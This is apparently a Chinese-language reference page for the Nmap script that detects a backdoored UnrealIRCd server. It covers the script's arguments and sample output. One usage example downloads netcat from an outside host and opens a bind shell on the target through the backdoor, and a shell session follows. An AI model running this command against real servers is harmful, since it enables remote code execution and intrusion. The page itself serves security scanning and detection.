指令類型:portrule
下載:https://svn.nmap.org/nmap/scripts/irc-unrealircd-backdoor.nse
Nmap Script指令摘要
檢查 IRC 伺服器是否被植入後門,方法是執行基於時間的命令(ping)並檢查響應時間。
irc-unrealircd-backdoor.command 腳本參數可以用來在遠端系統上執行任意命令。由於這種漏洞的特性(命令的輸出永遠不會返回),我們無法獲得命令的輸出。然而,它可以用來啟動 netcat 監聽器,如下所示:
$ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' <target>
$ ncat -vv localhost 4444
Ncat: Version 5.30BETA1 ( https://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:4444.
pwd
/home/ron/downloads/Unreal3.2-bad
whoami
ronMetasploit 也可用於利用這個漏洞。
除了執行任意命令外,還可以傳遞 irc-unrealircd-backdoor.kill 腳本參數,該參數僅用於終止 UnrealIRCd 進程。
參考資料:
Nmap Script指令參數
irc-unrealircd-backdoor.kill如果設置為 1 或 true,則終止運行中的被後門感染的 UnrealIRCd。
irc-unrealircd-backdoor.wait在執行檢查前等待的時間(秒)。建議設置這個參數以進行更可靠的檢查(100 是一個好值)。
irc-unrealircd-backdoor.command在遠端系統上運行的任意命令(注意,您將看不到命令的輸出)。即使主機不易受攻擊,也將始終嘗試這種方法。模式 %IP% 將被替換為目標主機的 IP 地址。
Nmap Script指令範例
nmap -sV --script=irc-unrealircd-backdoor <target>Nmap Script指令輸出
PORT STATE SERVICE
6667/tcp open irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277Nmap Script作者:
Vlatko Kosturjak Ron Bowes
License: Same as Nmap--See https://nmap.org/book/man-legal.html
